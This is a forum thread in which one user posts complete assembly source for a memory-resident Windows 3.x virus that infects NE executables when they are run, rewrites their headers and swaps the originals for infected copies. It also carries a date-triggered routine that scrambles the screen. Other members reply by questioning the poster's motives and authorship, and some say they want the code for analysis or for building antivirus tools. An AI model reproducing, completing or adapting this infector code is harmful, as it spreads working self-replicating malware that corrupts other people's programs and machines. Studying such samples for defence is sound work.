Page 1 of 2 12 LastLast
Results 1 to 10 of 15

Thread: A virus code by nakoka

  1. #1

    A virus code by nakoka

    ;!!!!!!!!!!!!!!!!!! Virus Run OK Ver Playgirl 1.0+ by nakoka(19age) !!!!!!!!!!!!!!!!!!!!!

    .model small, pascal
    .386
    include c:\masm611\include\win.inc
    include c:\masm611\include\cmacros.inc
    AllocMem PROTO :DWORD
    MemFree PROTO :WORD
    Extrn __A000H:abs
    .data
    AddLength equ 800h
    WinData DWORD 0 ; Windows reserved data space.
    FileHandle DW ?
    VTempName db 'v__temp.###',0
    VTempHandle dw ?
    WriteLength dword ?
    NEHeadLength dd ?
    DosEXELength dw ?
    FileLength dword ?
    Old_IP dw ?
    StartAdd dw ?
    DataLength dw ?
    DataAreaOff dw ?
    VStartAdd dw ?
    No_ModKrnl dw ?

    OFF db 1
    dw 85 ;kernel!_lopen
    ;dw offset call_open1+8,offset call_open2+7
    dw offset call_open2+7

    db 4
    dw 84 ;Kernel!_lseek
    dw offset call_seek1+9,offset call_seek2+0dh
    dw offset call_seek3+0dh,offset call_seek4+9

    db 2
    dw 81 ;Kernel!_lclose
    dw offset CloseAllFile+5,offset CloseFile+5

    db 5
    dw 349 ;Kernel!_hread
    dw offset call_read1+0eh ,call_read2+0eh
    dw offset call_read3+0dh ,call_read4+0ch
    dw offset call_read5+0dh

    db 3
    dw 350 ;Kernel!_hwrite
    dw offset call_write1+0dh ,call_write2+0ah
    dw offset call_write3+0dh

    db 1
    dw 171 ;Kernel!Allocdstocsalias
    dw offset call_allocdstocsalias+2

    db 1
    dw 83 ;Kernel!create
    dw offset call_create+7

    db 1
    dw 132 ;Kernel!getwinflags
    dw offset call_getwinflags+1

    db 1 ;Kernel!__A000H
    dw 174
    dw offset Video_Seg+1

    No_OFF dw 9
    Vcode_Len dw ?
    Next_Seg dd ?
    FileName_SEG dw ?
    FileName_OFF dw ?
    time dw ?
    date dw ?
    OK db 0
    MARK db 0
    EndMark db 'ZD'
    .code
    ;######################## Program Start #################
    __astart:
    call MyStart
    MyStart:
    pop bp
    sub bp,offset MyStart
    push bx
    push cx
    push di
    push si ;Save AppEntry

    push es
    push ds ;Save
    call_getwinflags:
    cCall GetWinFlags
    test ax,0010h ;WF_STANDARD
    jz Pmode ;Not Surport Standard Mode
    mov si,offset DataArea
    add si,bp
    add si,offset Old_IP
    mov bp,cs:[si] ;get old ip
    jmp EXIT
    Pmode:
    ;jmp call_open1
    call CreateDS
    mov eax,445a8888h
    int 21h ;Test If Resident

    cmp eax,'ZDOK'
    jz Exit_To_Old ;Already Resident

    mov ah,48h
    mov bx,AddLength/10h
    int 21h ;Alloc Memory
    mov es,ax

    mov cx,Vcode_Len
    mov si,StartAdd
    mov di,0
    push ds
    push cs
    pop ds
    rep movsb ;copy code
    pop ds

    mov si,0
    mov cx,AddLength
    sub cx,Vcode_Len ;copy data
    sub cx,50h
    rep movsb

    mov ax,204h
    mov bl,21h
    int 31h ;get old INT 21H Vec(P Mode)

    mov si,offset quit
    mov es:[si+1],dx
    mov es:[si+3],cx ;Save old INT 21H

    call_allocdstocsalias:
    cCall AllocDStoCSAlias,<es> ;Convert to code Segment
    mov cx,ax
    mov ax,205h
    mov bl,21h
    mov dx,offset New_WinExec_Entry
    int 31h ;set new INT 21H Vec(P Mode)
    jmp Exit_To_Old ;Exit


    ;call_open1:
    ; cCall _lopen,<ds,offset FileName,word ptr READ> ;Open File
    ; call AfterOpen
    Exit_To_Old:
    mov bp,Old_IP
    call_free1:
    INVOKE MemFree,ds
    EXIT:
    pop ds ;
    pop es ;
    pop si ;
    pop di ;;;; Use S-ice for Win,BPX at here,and then EXIT.
    pop cx ;
    pop bx ;
    jmp bp ;

    AfterOpen:
    mov OK,0
    mov FileHandle,ax ;Save Handle
    cmp ax,-1
    jnz OpenOK
    jmp Error
    OpenOK:
    mov ax,5700h
    mov bx,FileHandle
    int 21h ;Save Time & Date
    mov time,cx
    mov date,dx

    ;cCall GlobalAlloc,<GMEM_FIXED,dword ptr 40h> ;Alloc Memory for DOSEXEherd
    INVOKE AllocMem,40h
    mov es,ax
    call_read1:
    cCall _hread,<FileHandle,es,0,dword ptr 40h> ;Read DosEXEHeader
    cmp ax,0
    jnz ReadOK1
    jmp Error
    ReadOK1:
    xor si,si
    xor ax,ax
    mov cx,10
    _Add:
    add ax,es:[si]
    add si,2
    dec cx
    jz _AddOK
    jmp _Add
    _AddOK:
    cmp ax,'DZ' ;Already ZD
    jnz Go_on
    jmp CloseFile
    Go_on:
    mov ax,es:[3ch]
    mov DosEXELength,ax
    call_seek1:
    cCall _llseek,<FileHandle,eax,0>
    call_read2:
    cCall _hread,<FileHandle,es,0,dword ptr 40h> ;Read NE head
    cmp ax,0
    jnz ReadOK2
    jmp Error

    ReadOK2:
    cmp es:[0],'EN' ;New EXE File
    jnz CloseFile
    xor ecx,ecx
    mov cx,es:[2ch]
    add cx,es:[20h]
    mov NEHeadLength,ecx
    ;mov NEHeadLength,cx
    test word ptr es:[0ch],0100000000000000b ;Not DLL
    jnz CloseFile
    test word ptr es:[0ch],0000100000000000b ;NOT Self Load
    jnz CloseFile
    test word ptr es:[0ch],1000000000000000b ;NOT DLL
    jnz CloseFile

    call_free2:
    ;cCall GlobalFree,<es>
    INVOKE MemFree,es
    ;cCall GlobalAlloc,<GMEM_FIXED,NEHeadLength> ;0+NEHeadLength
    INVOKE AllocMem,NEHeadLength
    mov es,ax
    call_seek2:
    cCall _llseek,<FileHandle,dword ptr 0,2> ;To File End
    shl edx,16
    add eax,edx
    cmp eax,0fffffh
    ;jg CloseFile
    ja CloseFile ;edit on 96-10-31 7:20 p.m.
    mov FileLength,eax
    call_seek3:
    cCall _llseek,<FileHandle,dword ptr 0,0> ;To File Begin
    call_read3:
    cCall _hread,<FileHandle,es,0,NEHeadLength> ;Read Header
    cmp ax,0
    jnz ReadOK5
    jmp Error
    ReadOK5:

    ;###########Find if have Kernel ##################
    mov bp,DosEXELength
    mov ax,1
    mov si,es:[bp+28h] ;ofs Module Reference Table
    mov bx,es:[bp+2ah] ;ofs Imported Names Table
    FindKrnl:
    mov di,es:[bp+si]
    add di,bx
    cmp es:[bp+di+1],'EK'
    jnz NotKrnl
    cmp es:[bp+di+2+1],'NR'
    jnz NotKrnl
    mov No_ModKrnl,ax
    jmp After
    NotKrnl:
    inc ax
    add si,2
    cmp si,es:[bp+2ah]
    ;jl FindKrnl ;if < go on Find
    jb FindKrnl ;edit on 96-10-31 7:20 p.m
    jmp CloseFile

    ;################# Write the NAKOKA Mark #################

    After:
    xor ax,ax
    mov si,0
    mov cx,9
    __Add:
    add ax,es:[si]
    add si,2
    dec cx
    jz __AddOK
    jmp __Add
    __AddOK:
    mov bx,'DZ'
    sub bx,ax
    mov es:[12h],bx ;Write The NAKOKA Mark


    ;################ Work out Seg Table Offset #############
    mov ax,es:[bp+16h] ;CS seg
    dec ax
    mov bh,8
    mul bh ;ax is offset of seg tab
    add ax,es:[bp+22h]
    mov si,ax ;si is offset of seg tab(byte) from NEhead

    ;################ Work out Addpages ###################
    mov bx,1
    mov cl,es:[bp+32h]
    shl bx,cl ;bx is logical sector length(byte)
    push bx
    xor dx,dx
    mov ax,AddLength ;300h is addlen
    div bx ;ax is addpage
    push ax

    ;################# Modify Gangload ####################

    test byte ptr es:[bp+37h],1000b
    jz NoGangload

    mov dx,es:[bp+si] ;dx is start code segment offset(bytes) from NEhead
    cmp dx,es:[bp+38h] ;if ofs<=ofsGangLoad
    ;jge xy
    jae xy ;96-10-31 7:20 p.m.
    add es:[bp+38h],ax
    xy:
    cmp dx,es:[bp+38h]
    ;jl ndye ;if ofs<ofsgangLoad
    jb ndye ;96-10-31 7:20 p.m.
    mov cx,es:[bp+38h]
    add cx,es:[bp+3ah] ;cx=ofsGangLoad+lenGangLoad
    cmp dx,cx
    ;jg ndye ;if ofs>cx
    ja ndye ;96-10-31 7:20 p.m.
    add es:[bp+3ah],ax
    ndye:
    NoGangload: ;Browse RC Table
    ;################### Modify RC #################

    mov cx,es:[bp+26h] ;ofsResidentNameTable
    sub cx,es:[bp+24h] ;ofsResource
    cmp cx,0
    jz norc
    mov cx,ax ;cx is addpage
    mov di,es:[bp+24h]
    add di,bp ;di is offset of RCtab from DosEXEHead
    mov cx,es:[di+0] ;rscAlignShift
    mov bx,1
    shl bx,cl ;bx is 2^rscAlignShift
    mov cx,es:[di+4] ;RCcount
    mov ax,AddLength ;VLength
    xor dx,dx
    div bx
    add di,0ah
    Browse:
    add es:[di],ax
    add di,12
    dec cx
    jz ModifyOneRCOK
    jmp Browse
    ModifyOneRCOK:
    cmp word ptr es:[di],0
    jz RCOK
    mov cx,es:[di+2]
    add di,8h
    jmp Browse

    RCOK:
    norc:
    ;################## #######################

    pop ax ;codeaddpage
    add si,bp ;si is offset of start code segment from MZ
    ;push word ptr es:[si+8] ;Next Seg
    push word ptr es:[si]
    push word ptr es:[si+2]
    mov di,es:[si+2]
    mov VStartAdd,di
    BS:
    ;################ Modify Seg Table #############



    add es:[si+2],AddLength-50h ;segment length
    add es:[si+6],AddLength-50h ;lenMem
    mov bx,es:[si] ;bx is start code seg off
    mov cx,es:[bp+1ch] ;cx is segmentcount
    ;sub cx,es:[bp+16h] ;start code segment NO.
    mov si,es:[bp+22h] ;seg tab off
    mov byte ptr MARK,0
    Addofs:
    cmp es:[si+bp],bx
    jbe XY ;<=

    cmp byte ptr MARK,0
    jnz NNN ;if frist >
    mov dx,es:[si+bp]
    mov byte ptr MARK,2
    NNN:
    cmp dx,es:[si+bp]
    ;jl ADDSEG
    jb ADDSEG ;96-10-31 7:20 p.m.
    mov dx,es:[si+bp]
    ADDSEG:
    add es:[si+bp],ax
    XY:
    add si,8
    dec cx
    jz ModifyCodeTabOK
    jmp Addofs

    ModifyCodeTabOK:
    push dx ;Next Seg
    ;################ Modify IP #########################
    mov ax,es:[bp+14h]
    mov Old_IP,ax ;Save old IP
    mov es:[bp+14h],di ;Modify new ip
    K_B:
    add di,offset New_WinExec_Entry
    ; mov New_Winexec_off,di ;

    ;############### Create Temp File ###################

    push es

    mov si,FileName_OFF
    mov fs,FileName_SEG
    mov di,si
    go_on_find:
    cmp byte ptr fs:[si],'\'
    jnz findnext
    mov di,si
    findnext:
    inc si
    cmp byte ptr fs:[si],0
    jnz go_on_find

    cmp di,FileName_OFF
    jnz havepath
    mov cx,0
    push ds
    jmp nopath
    havepath:
    push ds

    mov cx,di
    inc cx
    sub cx,FileName_OFF
    nopath:
    mov si,FileName_OFF
    mov di,100h
    push ds
    pop es
    push fs
    pop ds
    rep movsb

    pop ds
    push ds
    pop es
    mov si,offset VTempName
    mov cx,12
    rep movsb

    call_create:
    ;cCall _lcreat,<ds,offset VTempName,0> ;Create a Temp file
    cCall _lcreat,<ds,100h,0>
    mov VTempHandle,ax
    cmp ax,-1
    jnz OpenTemp
    pop es
    jmp Error
    OpenTemp:
    pop es

    ;################ Write NE Head ###################
    call_write1:
    cCall _hwrite,<VTempHandle,es,0,NEHeadLength> ;Write Header
    jc Error ;96-10-31 7:30 p.m.
    call_free3:
    ;cCall GlobalFree,<es> ;Free EXEHeader
    INVOKE MemFree,es
    xor eax,eax
    xor ecx,ecx
    pop si ;si is Next Seg
    pop cx ;ax is offset of start code segment from MZ
    pop ax ;cx is segment length
    ;pop si ;si is next seg
    pop di ;bx is logial sector
    mul di
    shl edx,16
    add eax,edx ;eax is 1180h

    mov ebx,eax

    mov ax,si
    mul di
    shl edx,16
    add eax,edx ;eax is next seg (byte)

    push eax
    sub eax,ebx
    sub eax,ecx
    mov Next_Seg,eax

    add ebx,ecx
    mov eax,NEHeadLength ;!!!!!!!!!

    call CopyBlock ;write NEHeadLength to start code seg off

    ;##################### Write Code ####################


    mov eax,Next_Seg ;eax is code seg len + reloc
    add eax,AddLength

    ;cCall GlobalAlloc,<GMEM_FIXED,eax>
    INVOKE AllocMem,eax
    mov es,ax
    mov cx,Vcode_Len
    mov si,StartAdd
    mov di,0
    push ds
    push cs
    pop ds
    rep movsb
    pop ds

    mov si,0
    mov cx,AddLength
    sub cx,Vcode_Len
    sub cx,50h
    rep movsb

    call_read4:
    cCall _hread,<FileHandle,es,di,Next_Seg> ;di is Reloc Tab off

    mov ax,8
    mul word ptr es:[di]
    add ax,2
    mov bp,ax ;di is new reloc off
    add bp,di ;di ^
    mov bx,No_ModKrnl
    mov cx,No_OFF
    add es:[di],cx

    mov si,offset OFF
    Modify_Call:
    mov dx,[si+1+2] ;OFF
    push [si+1] ;KRNL NO.
    add dx,VStartAdd
    cmp [si+1],174
    jnz bs_174
    mov es:[bp],0105h
    jmp gh
    bs_174:
    mov es:[bp],0103h
    gh:
    mov es:[bp+2],dx
    mov es:[bp+4],bx
    pop es:[bp+6]
    add bp,8

    mov dl,[si] ;OFF count
    add si,3 ;off

    ccc:
    mov di,[si] ;off
    mov ax,[si+2] ;next
    add ax,VStartAdd
    cmp dl,1
    jnz cc1
    cmp [si+1-3],174
    jnz bs_174_1
    mov es:[di],0ffffh
    jmp zzz
    bs_174_1:
    mov ax,0ffffh
    cc1:
    mov es:[di],ax
    mov word ptr es:[di+2],0
    zzz:
    add si,2
    dec dl
    jnz ccc

    dec cx
    jnz Modify_Call

    mov eax,Next_Seg
    add eax,AddLength
    call_write2:
    cCall _hwrite,<VTempHandle,es,0,eax> ;Write Code
    jc Error ;96-10-31 7:30 p.m.
    call_free4:
    ;cCall GlobalFree,<es>
    INVOKE MemFree,es
    CopyRest:
    pop eax
    mov ebx,FileLength
    call CopyBlock ;Write rest Old Data and Code
    mov OK,1

    mov ax,5701h
    mov cx,time
    mov dx,date
    mov bx,VTempHandle
    int 21h ;Save Time & Date

    CloseAllFile:
    cCall _lclose,<VTempHandle>
    cmp ax,0
    jnz Error
    CloseFile:
    cCall _lclose,<FileHandle>
    cmp ax,0
    jnz Error

    cmp OK,1
    jnz Exit

    push ds
    mov ah,41h
    mov dx,FileName_OFF
    mov cx,FileName_SEG
    mov ds,cx
    int 21h ;Del source file
    pop ds
    jb Error

    mov ah,56h
    mov di,FileName_OFF
    mov cx,FileName_SEG
    mov es,cx
    mov dx,100h
    int 21h ;Rename file

    Exit:
    ret

    ;GoBack:
    ; mov ah,2
    ; mov dl,7
    ; mov ah,2
    ; mov dl,7
    ; INVOKE DOS3Call

    ;ix:
    ; mov ah,4Ch
    ; INVOKE DOS3Call ; Exit with return code from app.

    CopyBlock:
    push ebx
    mov ecx,ebx
    sub ecx,eax
    mov WriteLength,ecx
    call_seek4:
    cCall _llseek,<FileHandle,eax,0> ;eax is F1begin
    ;cCall GlobalAlloc,<GMEM_FIXED,WriteLength>
    INVOKE AllocMem,WriteLength
    mov es,ax
    call_read5:
    cCall _hread,<FileHandle,es,0,WriteLength>
    cmp ax,0
    jnz ReadOK4
    pop ebx ;
    pop ax ;call ip Adjust Stack
    jmp Error
    ReadOK4:
    call_write3:
    cCall _hwrite,<VTempHandle,es,0,WriteLength>
    jc Error ;96-10-31 7:30 p.m.
    call_free5:
    ;cCall GlobalFree,<es>
    INVOKE MemFree,es
    pop eax
    ret
    CreateDS:
    INVOKE AllocMem,200h ;Alloc DS
    mov es,ax
    mov si,offset DataArea
    add si,bp
    push si ;DataAreaOff

    mov di,0
    mov cx,offset _EndMark
    sub cx,offset _WinData
    push cx ;DataLength
    mov ax,cs
    mov ds,ax
    rep movsb
    mov ax,es
    mov ds,ax
    mov [StartAdd],bp
    pop DataLength ;Save DataLength
    ;pop K_BModule
    pop DataAreaOff

    mov ax,offset DataArea
    sub ax,offset __astart ;eax is Vcode length
    mov Vcode_Len,ax
    ret
    Error:
    ;cCall MessageBeep,<-1>
    jmp Exit

    New_WinExec_Entry:
    cmp eax,445a8888h
    jnz de_4c
    mov eax,'ZDOK'
    iret
    ;####################### Modify Screen ########################
    de_4c:
    cmp ah,4ch
    jnz Check
    ; sub sp,20h
    ; mov bp,sp
    ; ;cCall GetActiveWindow
    ; ;cCall GetTopWindow,<ax>
    ; ;cCall GetNextWindow,<ax,2>
    ; cCall GetFocus
    ; mov [bp+16],ax ;hwnd
    ; cCall GetDesktopWindow
    ; cCall GetWindowDC,<ax>
    ; mov [bp+18],ax ;myhdc
    ; cCall GetWindowRect,<word ptr [bp+16],ss,bp>
    ; mov ax,[bp+6]
    ; sub ax,[bp+2] ;di=bottom - top ------>y
    ; shr ax,1
    ; inc ax
    ; mov [bp+20],ax ;
    ; mov bx,[bp+4]
    ; sub bx,[bp] ;si=right - left ----->x
    ; mov [bp+22],bx
    ; xor di,di
    ;LOOPY:
    ; xor si,si
    ;LOOPX:
    ; mov ax,[bp+4] ;right
    ; sub ax,si
    ; mov bx,[bp+6] ;bottom
    ; sub bx,di
    ; push ax
    ; push bx
    ; cCall GetPixel,<word ptr [bp+18],ax,bx> ;[
    ; mov [bp+8],dx
    ; mov [bp+10],ax ;color a
    ; mov ax,[bp] ;left
    ; add ax,si
    ; mov bx,[bp+2] ;top
    ; add bx,di
    ; push ax
    ; push bx
    ; cCall GetPixel,<word ptr [bp+18],ax,bx> ;]
    ; mov [bp+12],dx
    ; mov [bp+14],ax ;color b
    ; pop bx
    ; pop ax
    ; cCall SetPixel,<word ptr [bp+18],ax,bx,word ptr [bp+8],word ptr [bp+10]>
    ;
    ; pop bx
    ; pop ax
    ; cCall SetPixel,<word ptr [bp+18],ax,bx,word ptr [bp+12],word ptr [bp+14]>
    ; inc si
    ; cmp si,[bp+22]
    ; jl LOOPX
    ; inc di
    ; cmp di,[bp+20]
    ; jl LOOPY
    ;
    ;
    ; add sp,20h

    push ax
    push cx
    push si
    push es

    mov ah,2ah
    int 21h
    cmp dh,11 ;Dec
    jnz qqqq
    cmp al,0 ;Sunday
    jz Check_time
    cmp al,6 ;Saturday
    jnz qqqq
    Check_time:
    mov ah,2ch
    int 21h
    cmp ch,22 ; >22:00
    ;jl qqqq
    ja qqqq ;96-10-31 7:20 p.m.
    Video_Seg:
    mov ax,__A000H
    mov es,ax
    mov cx,8000h-16
    mov si,0
    de:
    mov ax,es:[si+16]
    mov es:[si],ax
    add si,2
    loop de
    qqqq:
    pop es
    pop si
    pop cx
    pop ax
    jmp quit
    ;####################### COPY MY SELF ####################
    Check:
    cmp ah,4bh
    jnz quit
    push eax
    push ebx
    push ecx
    push edx
    push si
    push di
    push bp
    push ds
    push es
    push fs
    push gs ;4*4+7*2=30 Stack-30 bytes

    push ds
    push dx

    call V_Begin
    V_Begin:
    pop bp

    mov ax,offset V_Begin
    sub bp,ax
    call CreateDS

    pop dx
    pop fs ;fs:dx is lpszFileName
    mov FileName_SEG,fs
    mov FileName_OFF,dx
    call_open2:
    cCall _lopen,<fs,dx,word ptr READ>
    call AfterOpen
    call_free6:
    ;cCall GlobalFree,<ds>
    INVOKE MemFree,ds
    pop gs
    pop fs
    pop es
    pop ds
    pop bp
    pop di
    pop si
    pop edx
    pop ecx
    pop ebx
    pop eax
    quit:
    db 0eah
    dd ?
    ;################### Some Function #######################

    AllocMem PROC ,number:DWORD
    mov ah,48h
    mov ebx,number
    mov cx,bx
    shr ebx,4
    shl cx,4*3
    cmp cx,0
    jz Call21
    inc bx
    Call21:
    int 21h
    ret
    AllocMem endp

    MemFree PROC ,selector:WORD
    mov ah,49h
    mov bx,selector
    mov es,bx
    int 21h
    ret
    MemFree endp

    DataArea:
    _WinData DWORD 0 ;4 Windows reserved data space.
    _FileHandle DW ? ;2
    _VTempName db 'v__temp.###',0 ;12
    _VTempHandle dw ? ;2
    _WriteLength dword ? ;4
    _NEHeadLength dd ? ;2
    _DosEXELength dw ? ;2
    _FileLength dword ? ;4
    _Old_IP dw ? ;2
    _StartAdd dw ? ;2
    _DataLength dw ? ;2
    _DataAreaOff dw ? ;2
    _VStartAdd dw ?
    _No_ModKrnl dw ?
    _OFF db 1
    dw 85 ;kernel!_lopen
    ;dw offset call_open1+8,offset call_open2+7
    dw offset call_open2+7

    db 4
    dw 84 ;Kernel!_lseek
    dw offset call_seek1+9,offset call_seek2+0dh
    dw offset call_seek3+0dh,offset call_seek4+9

    db 2
    dw 81 ;Kernel!_lclose
    dw offset CloseAllFile+5,offset CloseFile+5

    db 5
    dw 349 ;Kernel!_hread
    dw offset call_read1+0eh ,call_read2+0eh
    dw offset call_read3+0dh ,call_read4+0ch
    dw offset call_read5+0dh

    db 3
    dw 350 ;Kernel!_hwrite
    dw offset call_write1+0dh ,call_write2+0ah
    dw offset call_write3+0dh

    db 1
    dw 171 ;Kernel!Allocdstocsalias
    dw offset call_allocdstocsalias+2

    db 1
    dw 83 ;Kernel!create
    dw offset call_create+7

    db 1
    dw 132 ;Kernel!getwinflags
    dw offset call_getwinflags+1

    db 1 ;Kernel!__A000H
    dw 174
    dw offset Video_Seg+1

    _No_OFF dw 9
    _Vcode_Len dw ?
    _Next_Seg dd ?
    _FileName_SEG dw ?
    _FileName_OFF dw ?
    _time dw ?
    _date dw ?
    _OK db 0
    _MARK db 0
    _EndMark db 'nakoka' ;2
    none dword 30h dup(?) ;+
    ;86

    end __astart ; start address

  2. #2
    PHP/PostgreSQL guy
    Join Date
    Dec 2001
    Posts
    1,164
    Hey...you...question...just what are you trying to do with this?
    I don't think anybody really cares about 'a virus code' on here.

    And it's too bad that won't work on my unix box.
    We the willing, led by the unknowing, have been doing the impossible for the ungrateful. We have done so much with so little for so long that we are now qualified to do just about anything with almost nothing.

  3. #3
    Senior Member
    Join Date
    Jul 2001
    Posts
    138
    I'm sure some people won't agree with me here, but....

    It's cool that you share your assembler code with us (though I haven't copied it yet to test it on my home system that is not and never will be attached to the internet...........)

    One question though,
    Why did you leave in all of the commented code (as under the section "Modify Screen")

    Actually two questions...
    Did you actually write this? (Your english is usually a little off is why I ask) The comments are pretty understandable english.
    (No I'm not being sarcastic, just curious)

    I don't code viruses, but I collect them to analyze their code. Just one more for the "Quarantine Box" (The red floppy disk box I keep my virus disks in)

    You should really put your coding skills to good use instead of wasting them on viruses and hacking into web sites. You could make something of yourself it you'd clean up your act. (That I'm sure many here will agree with me on)

    Happy Hacking (but only the legal kind from now on, right?)
    -----------------------------------------------------
    Warfare is the Way of deception.
    -Sun Tzu \"The Art of War\"

  4. #4
    Senior Member
    Join Date
    Oct 2001
    Posts
    872

    Post Dissassemble

    Great nakoka, so you can show-off your great dissassembling skills. Whatcha use to do it? W32Disam? Hackman?...pathetic. Honestly nakoka,...your on your 9th post and already in the [b]grey[b] colors. I'd stop bragging if I were you and get with the security. Now see, if you had programmed a patch for this virus...um...*cough*you*cough* made, then that would be a different story. Or if this isn't your virus, then it'd help to post a link to wear we might get patched up for this malacious virus.
    ...This Space For Rent.

    -[WebCarnage]

  5. #5
    Senior Member
    Join Date
    Nov 2001
    Posts
    681
    if this were your code... i would have a small amount of respect for you.... but i don't think it is. i still wouldn't care too much though, cause you aren't doing anything of value....

    time to wait for the "my-english-is-not-so-good" reply

  6. #6
    Fastest Thing Alive s0nIc's Avatar
    Join Date
    Sep 2001
    Location
    Sydney
    Posts
    1,584

    Cool

    hmmm well i think i would give this guy a thank you.. considering that i can annalyze this code and make some kind of anti-virus for it..

    i get rid of trojans manually... well atleast i try to get rid of them manually w/o using an anti-virus..

    how i do this is by annalyzing how the trojan works.. and u cannot always have an antivirus in a pc all the time.. as i have experienced in helping other people..

    this viral code may help me learn on how i can also get rid of a virus manually or create some sort of anti-virus for it from the top of my head..

    i know it seems impossible but i learn quick and hell i already removed a lot of trojans from different computers manually w/o the aid of virus scanners...

  7. #7
    Hi mom!
    Join Date
    Aug 2001
    Posts
    1,103
    I agree with Sonic - studying code is an excellent way to learn, and furthermore, I'm just curious. If the code was written by him, I frankly don't care. Those messages about 'me finds hole' and 'I hacked page' ... oh well... just another idiot, right?

  8. #8
    Fastest Thing Alive s0nIc's Avatar
    Join Date
    Sep 2001
    Location
    Sydney
    Posts
    1,584
    nakoka.... from what virus did you extract this code??

    and i want to know if this work is really yours...

  9. #9
    I will try my best to learn to about HACK and VIRUS. Because I am a clever Chinese boy.HAHA~~~~Thankyou!

  10. #10
    Fastest Thing Alive s0nIc's Avatar
    Join Date
    Sep 2001
    Location
    Sydney
    Posts
    1,584

    Cool

    hmmm.. nakoka.. im not saying that im encouraging you to keep on doing illegal activities.. but what i am saying is that im encouraging you to share your knowledge with us..

    im just a curious hacker who wanst to make a solution for every problem.. and i hope you are too..

    coz i promise you.. if u make a problem.. i sure hell am gonna make a solution for it.. :P heheh

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •